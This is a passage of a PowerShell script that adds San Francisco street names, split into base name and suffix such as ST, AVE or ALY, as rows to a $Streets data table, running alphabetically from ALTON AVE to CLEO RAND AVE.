$Streets.Rows.Add("ALTON AVE","","ALTON","AVE") + $null = $Streets.Rows.Add("ALVARADO ST","","ALVARADO","ST") + $null = $Streets.Rows.Add("ALVISO ST","","ALVISO","ST") + $null = $Streets.Rows.Add("ALVORD ST","","ALVORD","ST") + $null = $Streets.Rows.Add("AMADOR ST","","AMADOR","ST") + $null = $Streets.Rows.Add("AMATISTA LN","","AMATISTA","LN") + $null = $Streets.Rows.Add("AMATURY LOOP","","AMATURY","LOOP") + $null = $Streets.Rows.Add("AMAZON AVE","","AMAZON","AVE") + $null = $Streets.Rows.Add("AMBER DR","","AMBER","DR") + $null = $Streets.Rows.Add("AMBROSE BIERCE ST","","AMBROSE BIERCE","ST") + $null = $Streets.Rows.Add("AMES ST","","AMES","ST") + $null = $Streets.Rows.Add("AMETHYST WAY","","AMETHYST","WAY") + $null = $Streets.Rows.Add("AMHERST ST","","AMHERST","ST") + $null = $Streets.Rows.Add("AMITY ALY","","AMITY","ALY") + $null = $Streets.Rows.Add("ANDERSON ST","","ANDERSON","ST") + $null = $Streets.Rows.Add("ANDOVER ST","","ANDOVER","ST") + $null = $Streets.Rows.Add("ANDREW ST","","ANDREW","ST") + $null = $Streets.Rows.Add("ANGELOS ALY","","ANGELOS","ALY") + $null = $Streets.Rows.Add("ANGLO ALY","","ANGLO","ALY") + $null = $Streets.Rows.Add("ANKENY ST","","ANKENY","ST") + $null = $Streets.Rows.Add("ANNAPOLIS TER","","ANNAPOLIS","TER") + $null = $Streets.Rows.Add("ANNIE ST","","ANNIE","ST") + $null = $Streets.Rows.Add("ANSON PL","","ANSON","PL") + $null = $Streets.Rows.Add("ANTHONY ST","","ANTHONY","ST") + $null = $Streets.Rows.Add("ANTONIO ST","","ANTONIO","ST") + $null = $Streets.Rows.Add("ANZA AVE","","ANZA","AVE") + $null = $Streets.Rows.Add("ANZA ST","","ANZA","ST") + $null = $Streets.Rows.Add("ANZAVISTA AVE","","ANZAVISTA","AVE") + $null = $Streets.Rows.Add("APOLLO ST","","APOLLO","ST") + $null = $Streets.Rows.Add("APPAREL WAY","","APPAREL","WAY") + $null = $Streets.Rows.Add("APPLETON AVE","","APPLETON","AVE") + $null = $Streets.Rows.Add("APPLETON ST","","APPLETON","ST") + $null = $Streets.Rows.Add("APTOS AVE","","APTOS","AVE") + $null = $Streets.Rows.Add("AQUAVISTA WAY","","AQUAVISTA","WAY") + $null = $Streets.Rows.Add("ARAGO ST","","ARAGO","ST") + $null = $Streets.Rows.Add("ARBALLO DR","","ARBALLO","DR") + $null = $Streets.Rows.Add("ARBOL LN","","ARBOL","LN") + $null = $Streets.Rows.Add("ARBOR ST","","ARBOR","ST") + $null = $Streets.Rows.Add("ARCH ST","","ARCH","ST") + $null = $Streets.Rows.Add("ARCO WAY","","ARCO","WAY") + $null = $Streets.Rows.Add("ARDATH CT","","ARDATH","CT") + $null = $Streets.Rows.Add("ARDENWOOD WAY","","ARDENWOOD","WAY") + $null = $Streets.Rows.Add("ARELIOUS WALKER DR","","ARELIOUS WALKER","DR") + $null = $Streets.Rows.Add("ARELLANO AVE","","ARELLANO","AVE") + $null = $Streets.Rows.Add("ARGENT ALY","","ARGENT","ALY") + $null = $Streets.Rows.Add("ARGONAUT AVE","","ARGONAUT","AVE") + $null = $Streets.Rows.Add("ARGUELLO BLVD","","ARGUELLO","BLVD") + $null = $Streets.Rows.Add("ARKANSAS ST","","ARKANSAS","ST") + $null = $Streets.Rows.Add("ARLETA AVE","","ARLETA","AVE") + $null = $Streets.Rows.Add("ARLINGTON ST","","ARLINGTON","ST") + $null = $Streets.Rows.Add("ARMISTEAD RD","","ARMISTEAD","RD") + $null = $Streets.Rows.Add("ARMORY DR","","ARMORY","DR") + $null = $Streets.Rows.Add("ARMSTRONG AVE","","ARMSTRONG","AVE") + $null = $Streets.Rows.Add("ARNOLD AVE","","ARNOLD","AVE") + $null = $Streets.Rows.Add("ARROYO WAY","","ARROYO","WAY") + $null = $Streets.Rows.Add("ARTHUR AVE","","ARTHUR","AVE") + $null = $Streets.Rows.Add("ASH ST","","ASH","ST") + $null = $Streets.Rows.Add("ASHBURTON PL","","ASHBURTON","PL") + $null = $Streets.Rows.Add("ASHBURY ST","","ASHBURY","ST") + $null = $Streets.Rows.Add("ASHBURY TER","","ASHBURY","TER") + $null = $Streets.Rows.Add("ASHTON AVE","","ASHTON","AVE") + $null = $Streets.Rows.Add("ASHWOOD LN","","ASHWOOD","LN") + $null = $Streets.Rows.Add("ASPEN CT","","ASPEN","CT") + $null = $Streets.Rows.Add("ATALAYA TER","","ATALAYA","TER") + $null = $Streets.Rows.Add("ATHENS ST","","ATHENS","ST") + $null = $Streets.Rows.Add("ATOLL CIR","","ATOLL","CIR") + $null = $Streets.Rows.Add("ATTRIDGE ALY","","ATTRIDGE","ALY") + $null = $Streets.Rows.Add("AUBURN ST","","AUBURN","ST") + $null = $Streets.Rows.Add("AUGUST ALY","","AUGUST","ALY") + $null = $Streets.Rows.Add("AUGUSTA ST","","AUGUSTA","ST") + $null = $Streets.Rows.Add("AUSTIN ST","","AUSTIN","ST") + $null = $Streets.Rows.Add("AUTO DR","","AUTO","DR") + $null = $Streets.Rows.Add("AUTOMOBILE DR","","AUTOMOBILE","DR") + $null = $Streets.Rows.Add("AVALON AVE","","AVALON","AVE") + $null = $Streets.Rows.Add("AVENUE B","","AVENUE B","") + $null = $Streets.Rows.Add("AVENUE C","","AVENUE C","") + $null = $Streets.Rows.Add("AVENUE D","","AVENUE D","") + $null = $Streets.Rows.Add("AVENUE E","","AVENUE E","") + $null = $Streets.Rows.Add("AVENUE F","","AVENUE F","") + $null = $Streets.Rows.Add("AVENUE H","","AVENUE H","") + $null = $Streets.Rows.Add("AVENUE I","","AVENUE I","") + $null = $Streets.Rows.Add("AVENUE M","","AVENUE M","") + $null = $Streets.Rows.Add("AVENUE N","","AVENUE N","") + $null = $Streets.Rows.Add("AVENUE OF THE PALMS","","AVENUE OF THE PALMS","") + $null = $Streets.Rows.Add("AVERY ST","","AVERY","ST") + $null = $Streets.Rows.Add("AVILA ST","","AVILA","ST") + $null = $Streets.Rows.Add("AVOCA ALY","","AVOCA","ALY") + $null = $Streets.Rows.Add("WURSTER LN","","WURSTER","LN") + $null = $Streets.Rows.Add("AVON WAY","","AVON","WAY") + $null = $Streets.Rows.Add("AZTEC ST","","AZTEC","ST") + $null = $Streets.Rows.Add("BACHE ST","","BACHE","ST") + $null = $Streets.Rows.Add("BACON ST","","BACON","ST") + $null = $Streets.Rows.Add("BADEN ST","","BADEN","ST") + $null = $Streets.Rows.Add("BADGER ST","","BADGER","ST") + $null = $Streets.Rows.Add("BAKER CT","","BAKER","CT") + $null = $Streets.Rows.Add("BAKER ST","","BAKER","ST") + $null = $Streets.Rows.Add("BALANCE ST","","BALANCE","ST") + $null = $Streets.Rows.Add("BALBOA ST","","BALBOA","ST") + $null = $Streets.Rows.Add("BALCETA AVE","","BALCETA","AVE") + $null = $Streets.Rows.Add("BALDWIN CT","","BALDWIN","CT") + $null = $Streets.Rows.Add("BALHI CT","","BALHI","CT") + $null = $Streets.Rows.Add("BALMY ST","","BALMY","ST") + $null = $Streets.Rows.Add("BALTIMORE WAY","","BALTIMORE","WAY") + $null = $Streets.Rows.Add("BANBURY DR","","BANBURY","DR") + $null = $Streets.Rows.Add("BANCROFT AVE","","BANCROFT","AVE") + $null = $Streets.Rows.Add("BANK ST","","BANK","ST") + $null = $Streets.Rows.Add("BANKS ST","","BANKS","ST") + $null = $Streets.Rows.Add("BANNAN PL","","BANNAN","PL") + $null = $Streets.Rows.Add("BANNEKER WAY","","BANNEKER","WAY") + $null = $Streets.Rows.Add("BANNOCK ST","","BANNOCK","ST") + $null = $Streets.Rows.Add("BARCELONA AVE","","BARCELONA","AVE") + $null = $Streets.Rows.Add("BARNARD AVE","","BARNARD","AVE") + $null = $Streets.Rows.Add("BARNEVELD AVE","","BARNEVELD","AVE") + $null = $Streets.Rows.Add("BARRY CT","","BARRY","CT") + $null = $Streets.Rows.Add("BARTLETT ST","","BARTLETT","ST") + $null = $Streets.Rows.Add("BARTOL ST","","BARTOL","ST") + $null = $Streets.Rows.Add("BASS CT","","BASS","CT") + $null = $Streets.Rows.Add("BATTERY ST","","BATTERY","ST") + $null = $Streets.Rows.Add("BATTERY BLANEY RD","","BATTERY BLANEY","RD") + $null = $Streets.Rows.Add("BATTERY CAULFIELD RD","","BATTERY CAULFIELD","RD") + $null = $Streets.Rows.Add("BATTERY CHAMBERLIN RD","","BATTERY CHAMBERLIN","RD") + $null = $Streets.Rows.Add("BATTERY CRANSTON RD","","BATTERY CRANSTON","RD") + $null = $Streets.Rows.Add("BATTERY CROSBY RD","","BATTERY CROSBY","RD") + $null = $Streets.Rows.Add("BATTERY DYNAMITE RD","","BATTERY DYNAMITE","RD") + $null = $Streets.Rows.Add("BATTERY EAST RD","","BATTERY EAST","RD") + $null = $Streets.Rows.Add("BATTERY SAFFORD RD","","BATTERY SAFFORD","RD") + $null = $Streets.Rows.Add("BATTERY WAGNER RD","","BATTERY WAGNER","RD") + $null = $Streets.Rows.Add("BAXTER ALY","","BAXTER","ALY") + $null = $Streets.Rows.Add("BAY ST","","BAY","ST") + $null = $Streets.Rows.Add("BAY SHORE BLVD","","BAY SHORE","BLVD") + $null = $Streets.Rows.Add("BAY SHORE BLVD OFF RAMP","","BAY SHORE BLVD OFF","RAMP") + $null = $Streets.Rows.Add("BAY SHORE BLVD ON RAMP","","BAY SHORE BLVD ON","RAMP") + $null = $Streets.Rows.Add("BAY VIEW ST","","BAY VIEW","ST") + $null = $Streets.Rows.Add("BAYSIDE DR","","BAYSIDE","DR") + $null = $Streets.Rows.Add("BAYSIDE VILLAGE PL","","BAYSIDE VILLAGE","PL") + $null = $Streets.Rows.Add("BAYVIEW CIR","","BAYVIEW","CIR") + $null = $Streets.Rows.Add("BAYVIEW PARK RD","","BAYVIEW PARK","RD") + $null = $Streets.Rows.Add("BAYWOOD CT","","BAYWOOD","CT") + $null = $Streets.Rows.Add("BEACH ST","","BEACH","ST") + $null = $Streets.Rows.Add("BEACHMONT DR","","BEACHMONT","DR") + $null = $Streets.Rows.Add("BEACON ST","","BEACON","ST") + $null = $Streets.Rows.Add("BEALE ST","","BEALE","ST") + $null = $Streets.Rows.Add("BEATRICE LN","","BEATRICE","LN") + $null = $Streets.Rows.Add("BEAUMONT AVE","","BEAUMONT","AVE") + $null = $Streets.Rows.Add("BEAVER ST","","BEAVER","ST") + $null = $Streets.Rows.Add("BECKETT ST","","BECKETT","ST") + $null = $Streets.Rows.Add("BEDFORD PL","","BEDFORD","PL") + $null = $Streets.Rows.Add("BEEMAN LN","","BEEMAN","LN") + $null = $Streets.Rows.Add("BEHR AVE","","BEHR","AVE") + $null = $Streets.Rows.Add("BEIDEMAN ST","","BEIDEMAN","ST") + $null = $Streets.Rows.Add("BELCHER ST","","BELCHER","ST") + $null = $Streets.Rows.Add("BELDEN ST","","BELDEN","ST") + $null = $Streets.Rows.Add("BELGRAVE AVE","","BELGRAVE","AVE") + $null = $Streets.Rows.Add("BELL CT","","BELL","CT") + $null = $Streets.Rows.Add("BELLA VISTA WAY","","BELLA VISTA","WAY") + $null = $Streets.Rows.Add("BELLAIR PL","","BELLAIR","PL") + $null = $Streets.Rows.Add("BELLE AVE","","BELLE","AVE") + $null = $Streets.Rows.Add("BELLES ST","","BELLES","ST") + $null = $Streets.Rows.Add("BELLEVUE AVE","","BELLEVUE","AVE") + $null = $Streets.Rows.Add("BELMONT AVE","","BELMONT","AVE") + $null = $Streets.Rows.Add("BELVEDERE ST","","BELVEDERE","ST") + $null = $Streets.Rows.Add("BEMIS ST","","BEMIS","ST") + $null = $Streets.Rows.Add("BENGAL ALY","","BENGAL","ALY") + $null = $Streets.Rows.Add("BENNINGTON ST","","BENNINGTON","ST") + $null = $Streets.Rows.Add("BENTON AVE","","BENTON","AVE") + $null = $Streets.Rows.Add("BEPLER ST","","BEPLER","ST") + $null = $Streets.Rows.Add("BERCUT ACCESS RD","","BERCUT ACCESS","RD") + $null = $Streets.Rows.Add("BERGEN ALY","","BERGEN","ALY") + $null = $Streets.Rows.Add("BERKELEY WAY","","BERKELEY","WAY") + $null = $Streets.Rows.Add("BERKSHIRE WAY","","BERKSHIRE","WAY") + $null = $Streets.Rows.Add("BERNAL HEIGHTS BLVD","","BERNAL HEIGHTS","BLVD") + $null = $Streets.Rows.Add("BERNARD ST","","BERNARD","ST") + $null = $Streets.Rows.Add("BERNICE ST","","BERNICE","ST") + $null = $Streets.Rows.Add("BERNICE RODGERS WAY","","BERNICE RODGERS","WAY") + $null = $Streets.Rows.Add("BERRY ST","","BERRY","ST") + $null = $Streets.Rows.Add("BERRY EXTENSION ST","","BERRY EXTENSION","ST") + $null = $Streets.Rows.Add("BERTHA LN","","BERTHA","LN") + $null = $Streets.Rows.Add("BERTIE MINOR LN","","BERTIE MINOR","LN") + $null = $Streets.Rows.Add("BERTITA ST","","BERTITA","ST") + $null = $Streets.Rows.Add("BERWICK PL","","BERWICK","PL") + $null = $Streets.Rows.Add("BESSIE ST","","BESSIE","ST") + $null = $Streets.Rows.Add("BEULAH ST","","BEULAH","ST") + $null = $Streets.Rows.Add("BEVERLY ST","","BEVERLY","ST") + $null = $Streets.Rows.Add("BIGELOW CT","","BIGELOW","CT") + $null = $Streets.Rows.Add("BIGLER AVE","","BIGLER","AVE") + $null = $Streets.Rows.Add("BIRCH ST","","BIRCH","ST") + $null = $Streets.Rows.Add("BIRCHWOOD CT","","BIRCHWOOD","CT") + $null = $Streets.Rows.Add("BIRD ST","","BIRD","ST") + $null = $Streets.Rows.Add("BIRMINGHAM RD","","BIRMINGHAM","RD") + $null = $Streets.Rows.Add("BISHOP ST","","BISHOP","ST") + $null = $Streets.Rows.Add("BITTING AVE","","BITTING","AVE") + $null = $Streets.Rows.Add("BLACK PL","","BLACK","PL") + $null = $Streets.Rows.Add("BLACKSTONE CT","","BLACKSTONE","CT") + $null = $Streets.Rows.Add("BLAIR TER","","BLAIR","TER") + $null = $Streets.Rows.Add("BLAIRWOOD LN","","BLAIRWOOD","LN") + $null = $Streets.Rows.Add("BLAKE ST","","BLAKE","ST") + $null = $Streets.Rows.Add("BLANCHE ST","","BLANCHE","ST") + $null = $Streets.Rows.Add("BLANDY ST","","BLANDY","ST") + $null = $Streets.Rows.Add("BLANKEN AVE","","BLANKEN","AVE") + $null = $Streets.Rows.Add("BLATCHFORD LN","","BLATCHFORD","LN") + $null = $Streets.Rows.Add("BLISS CT","","BLISS","CT") + $null = $Streets.Rows.Add("BLISS RD","","BLISS","RD") + $null = $Streets.Rows.Add("BLUXOME ST","","BLUXOME","ST") + $null = $Streets.Rows.Add("BLYTHDALE AVE","","BLYTHDALE","AVE") + $null = $Streets.Rows.Add("BOALT ST","","BOALT","ST") + $null = $Streets.Rows.Add("BOARDMAN PL","","BOARDMAN","PL") + $null = $Streets.Rows.Add("BOB KAUFMAN ALY","","BOB KAUFMAN","ALY") + $null = $Streets.Rows.Add("BOCANA ST","","BOCANA","ST") + $null = $Streets.Rows.Add("BONIFACIO ST","","BONIFACIO","ST") + $null = $Streets.Rows.Add("BONITA ST","","BONITA","ST") + $null = $Streets.Rows.Add("BONNIE BRAE LN","","BONNIE BRAE","LN") + $null = $Streets.Rows.Add("BONVIEW ST","","BONVIEW","ST") + $null = $Streets.Rows.Add("BORICA ST","","BORICA","ST") + $null = $Streets.Rows.Add("BOSWORTH ST","","BOSWORTH","ST") + $null = $Streets.Rows.Add("BOUTWELL ST","","BOUTWELL","ST") + $null = $Streets.Rows.Add("BOWDOIN ST","","BOWDOIN","ST") + $null = $Streets.Rows.Add("BOWLEY CT","","BOWLEY","CT") + $null = $Streets.Rows.Add("BOWLEY ST","","BOWLEY","ST") + $null = $Streets.Rows.Add("BOWLING GREEN DR","","BOWLING GREEN","DR") + $null = $Streets.Rows.Add("BOWMAN CT","","BOWMAN","CT") + $null = $Streets.Rows.Add("BOYD ST","","BOYD","ST") + $null = $Streets.Rows.Add("BOYLSTON ST","","BOYLSTON","ST") + $null = $Streets.Rows.Add("BOYNTON CT","","BOYNTON","CT") + $null = $Streets.Rows.Add("BRADFORD ST","","BRADFORD","ST") + $null = $Streets.Rows.Add("BRADY ST","","BRADY","ST") + $null = $Streets.Rows.Add("BRANNAN ST","","BRANNAN","ST") + $null = $Streets.Rows.Add("BRANT ALY","","BRANT","ALY") + $null = $Streets.Rows.Add("BRAZIL AVE","","BRAZIL","AVE") + $null = $Streets.Rows.Add("BREEN PL","","BREEN","PL") + $null = $Streets.Rows.Add("BRENTWOOD AVE","","BRENTWOOD","AVE") + $null = $Streets.Rows.Add("BRET HARTE TER","","BRET HARTE","TER") + $null = $Streets.Rows.Add("BREWSTER ST","","BREWSTER","ST") + $null = $Streets.Rows.Add("BRICE TER","","BRICE","TER") + $null = $Streets.Rows.Add("BRIDGEVIEW DR","","BRIDGEVIEW","DR") + $null = $Streets.Rows.Add("BRIDGEVIEW WAY","","BRIDGEVIEW","WAY") + $null = $Streets.Rows.Add("BRIGHT ST","","BRIGHT","ST") + $null = $Streets.Rows.Add("BRIGHTON AVE","","BRIGHTON","AVE") + $null = $Streets.Rows.Add("BRITTON ST","","BRITTON","ST") + $null = $Streets.Rows.Add("BROAD ST","","BROAD","ST") + $null = $Streets.Rows.Add("BROADMOOR DR","","BROADMOOR","DR") + $null = $Streets.Rows.Add("BROADWAY","","BROADWAY","") + $null = $Streets.Rows.Add("BRODERICK ST","","BRODERICK","ST") + $null = $Streets.Rows.Add("BROMLEY PL","","BROMLEY","PL") + $null = $Streets.Rows.Add("BROMPTON AVE","","BROMPTON","AVE") + $null = $Streets.Rows.Add("BRONTE ST","","BRONTE","ST") + $null = $Streets.Rows.Add("BROOK ST","","BROOK","ST") + $null = $Streets.Rows.Add("BROOKDALE AVE","","BROOKDALE","AVE") + $null = $Streets.Rows.Add("BROOKHAVEN LN","","BROOKHAVEN","LN") + $null = $Streets.Rows.Add("BROOKLYN PL","","BROOKLYN","PL") + $null = $Streets.Rows.Add("BROOKS ST","","BROOKS","ST") + $null = $Streets.Rows.Add("BROSNAN ST","","BROSNAN","ST") + $null = $Streets.Rows.Add("BROTHERHOOD WAY","","BROTHERHOOD","WAY") + $null = $Streets.Rows.Add("BROWN ST","","BROWN","ST") + $null = $Streets.Rows.Add("BRUCE AVE","","BRUCE","AVE") + $null = $Streets.Rows.Add("BRUMISS TER","","BRUMISS","TER") + $null = $Streets.Rows.Add("BRUNSWICK ST","","BRUNSWICK","ST") + $null = $Streets.Rows.Add("BRUSH LN","","BRUSH","LN") + $null = $Streets.Rows.Add("BRUSH PL","","BRUSH","PL") + $null = $Streets.Rows.Add("BRUSSELS ST","","BRUSSELS","ST") + $null = $Streets.Rows.Add("BRYANT ST","","BRYANT","ST") + $null = $Streets.Rows.Add("BUCARELI DR","","BUCARELI","DR") + $null = $Streets.Rows.Add("BUCHANAN ST","","BUCHANAN","ST") + $null = $Streets.Rows.Add("BUCKINGHAM WAY","","BUCKINGHAM","WAY") + $null = $Streets.Rows.Add("SAN FRANCISCO GOLF CLUB RD","","SAN FRANCISCO GOLF CLUB","RD") + $null = $Streets.Rows.Add("VICHA RATANAPAKDEE WAY","","VICHA RATANAPAKDEE","WAY") + $null = $Streets.Rows.Add("BUENA VISTA TER","","BUENA VISTA","TER") + $null = $Streets.Rows.Add("BURGOYNE ST","","BURGOYNE","ST") + $null = $Streets.Rows.Add("BURKE AVE","","BURKE","AVE") + $null = $Streets.Rows.Add("BURLWOOD DR","","BURLWOOD","DR") + $null = $Streets.Rows.Add("BURNETT AVE","","BURNETT","AVE") + $null = $Streets.Rows.Add("JEFF ADACHI WAY","","JEFF ADACHI","WAY") + $null = $Streets.Rows.Add("BURNS PL","","BURNS","PL") + $null = $Streets.Rows.Add("BURNSIDE AVE","","BURNSIDE","AVE") + $null = $Streets.Rows.Add("BURR AVE","","BURR","AVE") + $null = $Streets.Rows.Add("BURRITT ST","","BURRITT","ST") + $null = $Streets.Rows.Add("BURROWS ST","","BURROWS","ST") + $null = $Streets.Rows.Add("BUSH ST","","BUSH","ST") + $null = $Streets.Rows.Add("BUTTE PL","","BUTTE","PL") + $null = $Streets.Rows.Add("BYRON CT","","BYRON","CT") + $null = $Streets.Rows.Add("BYXBEE ST","","BYXBEE","ST") + $null = $Streets.Rows.Add("C ST","","C","ST") + $null = $Streets.Rows.Add("CABRILLO ST","","CABRILLO","ST") + $null = $Streets.Rows.Add("CADELL PL","","CADELL","PL") + $null = $Streets.Rows.Add("CAINE AVE","","CAINE","AVE") + $null = $Streets.Rows.Add("CAIRE TER","","CAIRE","TER") + $null = $Streets.Rows.Add("CALEDONIA ST","","CALEDONIA","ST") + $null = $Streets.Rows.Add("CALGARY ST","","CALGARY","ST") + $null = $Streets.Rows.Add("CALHOUN TER","","CALHOUN","TER") + $null = $Streets.Rows.Add("CALIFORNIA AVE","","CALIFORNIA","AVE") + $null = $Streets.Rows.Add("CALIFORNIA ST","","CALIFORNIA","ST") + $null = $Streets.Rows.Add("CALVERT DR","","CALVERT","DR") + $null = $Streets.Rows.Add("CAMBON DR","","CAMBON","DR") + $null = $Streets.Rows.Add("CAMBRIDGE ST","","CAMBRIDGE","ST") + $null = $Streets.Rows.Add("CAMELLIA AVE","","CAMELLIA","AVE") + $null = $Streets.Rows.Add("CAMEO WAY","","CAMEO","WAY") + $null = $Streets.Rows.Add("CAMERON WAY","","CAMERON","WAY") + $null = $Streets.Rows.Add("CAMP ST","","CAMP","ST") + $null = $Streets.Rows.Add("LONG BRIDGE VARA","","LONG BRIDGE VARA","") + $null = $Streets.Rows.Add("CAMPBELL AVE","","CAMPBELL","AVE") + $null = $Streets.Rows.Add("CAMPTON PL","","CAMPTON","PL") + $null = $Streets.Rows.Add("CAMPUS LN","","CAMPUS","LN") + $null = $Streets.Rows.Add("CAMPUS WAY","","CAMPUS","WAY") + $null = $Streets.Rows.Add("CANBY LN","","CANBY","LN") + $null = $Streets.Rows.Add("CANBY ST","","CANBY","ST") + $null = $Streets.Rows.Add("CANDLESTICK COVE WAY","","CANDLESTICK COVE","WAY") + $null = $Streets.Rows.Add("CANDLESTICK POINT SRA","","CANDLESTICK POINT SRA","") + $null = $Streets.Rows.Add("CANYON DR","","CANYON","DR") + $null = $Streets.Rows.Add("CAPISTRANO AVE","","CAPISTRANO","AVE") + $null = $Streets.Rows.Add("CAPITOL AVE","","CAPITOL","AVE") + $null = $Streets.Rows.Add("CAPP ST","","CAPP","ST") + $null = $Streets.Rows.Add("CAPRA WAY","","CAPRA","WAY") + $null = $Streets.Rows.Add("CARD ALY","","CARD","ALY") + $null = $Streets.Rows.Add("CARDENAS AVE","","CARDENAS","AVE") + $null = $Streets.Rows.Add("CARGO WAY","","CARGO","WAY") + $null = $Streets.Rows.Add("CARL ST","","CARL","ST") + $null = $Streets.Rows.Add("CARMEL ST","","CARMEL","ST") + $null = $Streets.Rows.Add("CARMELITA ST","","CARMELITA","ST") + $null = $Streets.Rows.Add("CARNELIAN WAY","","CARNELIAN","WAY") + $null = $Streets.Rows.Add("CAROLINA ST","","CAROLINA","ST") + $null = $Streets.Rows.Add("CARPENTER CT","","CARPENTER","CT") + $null = $Streets.Rows.Add("CARR ST","","CARR","ST") + $null = $Streets.Rows.Add("CARRIE ST","","CARRIE","ST") + $null = $Streets.Rows.Add("CARRIZAL ST","","CARRIZAL","ST") + $null = $Streets.Rows.Add("CARROLL AVE","","CARROLL","AVE") + $null = $Streets.Rows.Add("CARSON ST","","CARSON","ST") + $null = $Streets.Rows.Add("CARTER ST","","CARTER","ST") + $null = $Streets.Rows.Add("CARVER ST","","CARVER","ST") + $null = $Streets.Rows.Add("CASA WAY","","CASA","WAY") + $null = $Streets.Rows.Add("CASCADE WALK","","CASCADE","WALK") + $null = $Streets.Rows.Add("CASE ST","","CASE","ST") + $null = $Streets.Rows.Add("CASELLI AVE","","CASELLI","AVE") + $null = $Streets.Rows.Add("CASHMERE ST","","CASHMERE","ST") + $null = $Streets.Rows.Add("CASITAS AVE","","CASITAS","AVE") + $null = $Streets.Rows.Add("CASSANDRA CT","","CASSANDRA","CT") + $null = $Streets.Rows.Add("CASTELO AVE","","CASTELO","AVE") + $null = $Streets.Rows.Add("CASTENADA AVE","","CASTENADA","AVE") + $null = $Streets.Rows.Add("CASTILLO ST","","CASTILLO","ST") + $null = $Streets.Rows.Add("CASTLE ST","","CASTLE","ST") + $null = $Streets.Rows.Add("CASTLE MANOR AVE","","CASTLE MANOR","AVE") + $null = $Streets.Rows.Add("CASTRO ST","","CASTRO","ST") + $null = $Streets.Rows.Add("DR MAYA ANGELOU LN","","DR MAYA ANGELOU","LN") + $null = $Streets.Rows.Add("CATHERINE CT","","CATHERINE","CT") + $null = $Streets.Rows.Add("CAYUGA AVE","","CAYUGA","AVE") + $null = $Streets.Rows.Add("CCSF PARKING LOT","","CCSF PARKING LOT","") + $null = $Streets.Rows.Add("CECILIA AVE","","CECILIA","AVE") + $null = $Streets.Rows.Add("CEDAR ST","","CEDAR","ST") + $null = $Streets.Rows.Add("CEDRO AVE","","CEDRO","AVE") + $null = $Streets.Rows.Add("CENTRAL AVE","","CENTRAL","AVE") + $null = $Streets.Rows.Add("CENTRAL MAGAZINE RD","","CENTRAL MAGAZINE","RD") + $null = $Streets.Rows.Add("CENTURY PL","","CENTURY","PL") + $null = $Streets.Rows.Add("CERES ST","","CERES","ST") + $null = $Streets.Rows.Add("CERRITOS AVE","","CERRITOS","AVE") + $null = $Streets.Rows.Add("CERVANTES BLVD","","CERVANTES","BLVD") + $null = $Streets.Rows.Add("CESAR CHAVEZ ST","","CESAR CHAVEZ","ST") + $null = $Streets.Rows.Add("CESAR CHAVEZ ON RAMP","","CESAR CHAVEZ ON","RAMP") + $null = $Streets.Rows.Add("CHABOT TER","","CHABOT","TER") + $null = $Streets.Rows.Add("CHAIN OF LAKES DR","","CHAIN OF LAKES","DR") + $null = $Streets.Rows.Add("CHANCERY LN","","CHANCERY","LN") + $null = $Streets.Rows.Add("SLOAN ALY","","SLOAN","ALY") + $null = $Streets.Rows.Add("CHANNEL ST","","CHANNEL","ST") + $null = $Streets.Rows.Add("CHAPMAN ST","","CHAPMAN","ST") + $null = $Streets.Rows.Add("CHARLES ST","","CHARLES","ST") + $null = $Streets.Rows.Add("CHARLES J BRENHAM PL","","CHARLES J BRENHAM","PL") + $null = $Streets.Rows.Add("CHARLTON CT","","CHARLTON","CT") + $null = $Streets.Rows.Add("CHARTER OAK AVE","","CHARTER OAK","AVE") + $null = $Streets.Rows.Add("CHASE CT","","CHASE","CT") + $null = $Streets.Rows.Add("CHATHAM PL","","CHATHAM","PL") + $null = $Streets.Rows.Add("CHATTANOOGA ST","","CHATTANOOGA","ST") + $null = $Streets.Rows.Add("CHAVES AVE","","CHAVES","AVE") + $null = $Streets.Rows.Add("CHENERY ST","","CHENERY","ST") + $null = $Streets.Rows.Add("CHERRY ST","","CHERRY","ST") + $null = $Streets.Rows.Add("CHESLEY ST","","CHESLEY","ST") + $null = $Streets.Rows.Add("CHESTER AVE","","CHESTER","AVE") + $null = $Streets.Rows.Add("CHESTNUT ST","","CHESTNUT","ST") + $null = $Streets.Rows.Add("CHICAGO WAY","","CHICAGO","WAY") + $null = $Streets.Rows.Add("CHILD ST","","CHILD","ST") + $null = $Streets.Rows.Add("CHILTON AVE","","CHILTON","AVE") + $null = $Streets.Rows.Add("CHINA BASIN ST","","CHINA BASIN","ST") + $null = $Streets.Rows.Add("CHINOOK CT","","CHINOOK","CT") + $null = $Streets.Rows.Add("CHRISTMAS TREE POINT RD","","CHRISTMAS TREE POINT","RD") + $null = $Streets.Rows.Add("CHRISTOPHER DR","","CHRISTOPHER","DR") + $null = $Streets.Rows.Add("CHULA LN","","CHULA","LN") + $null = $Streets.Rows.Add("CHUMASERO DR","","CHUMASERO","DR") + $null = $Streets.Rows.Add("CHURCH ST","","CHURCH","ST") + $null = $Streets.Rows.Add("CHURCH ACCESS RD","","CHURCH ACCESS","RD") + $null = $Streets.Rows.Add("CHURCH PARKING LOT","","CHURCH PARKING LOT","") + $null = $Streets.Rows.Add("CIELITO DR","","CIELITO","DR") + $null = $Streets.Rows.Add("CIRCULAR AVE","","CIRCULAR","AVE") + $null = $Streets.Rows.Add("CITYVIEW WAY","","CITYVIEW","WAY") + $null = $Streets.Rows.Add("CLAIRVIEW CT","","CLAIRVIEW","CT") + $null = $Streets.Rows.Add("CLARA ST","","CLARA","ST") + $null = $Streets.Rows.Add("CLAREMONT BLVD","","CLAREMONT","BLVD") + $null = $Streets.Rows.Add("CLARENCE PL","","CLARENCE","PL") + $null = $Streets.Rows.Add("CLARENDON AVE","","CLARENDON","AVE") + $null = $Streets.Rows.Add("CLARION ALY","","CLARION","ALY") + $null = $Streets.Rows.Add("CLARKE LN","","CLARKE","LN") + $null = $Streets.Rows.Add("CLARKE ST","","CLARKE","ST") + $null = $Streets.Rows.Add("CLARKSON ST","","CLARKSON","ST") + $null = $Streets.Rows.Add("CLAUDE LN","","CLAUDE","LN") + $null = $Streets.Rows.Add("CLAY ST","","CLAY","ST") + $null = $Streets.Rows.Add("CLAYTON ST","","CLAYTON","ST") + $null = $Streets.Rows.Add("CLEARFIELD DR","","CLEARFIELD","DR") + $null = $Streets.Rows.Add("CLEARVIEW CT","","CLEARVIEW","CT") + $null = $Streets.Rows.Add("CLEARY CT","","CLEARY","CT") + $null = $Streets.Rows.Add("CLEMENT ST","","CLEMENT","ST") + $null = $Streets.Rows.Add("CLEMENTINA ST","","CLEMENTINA","ST") + $null = $Streets.Rows.Add("CLEO RAND AVE","","CLEO RAND","AVE") + $null = 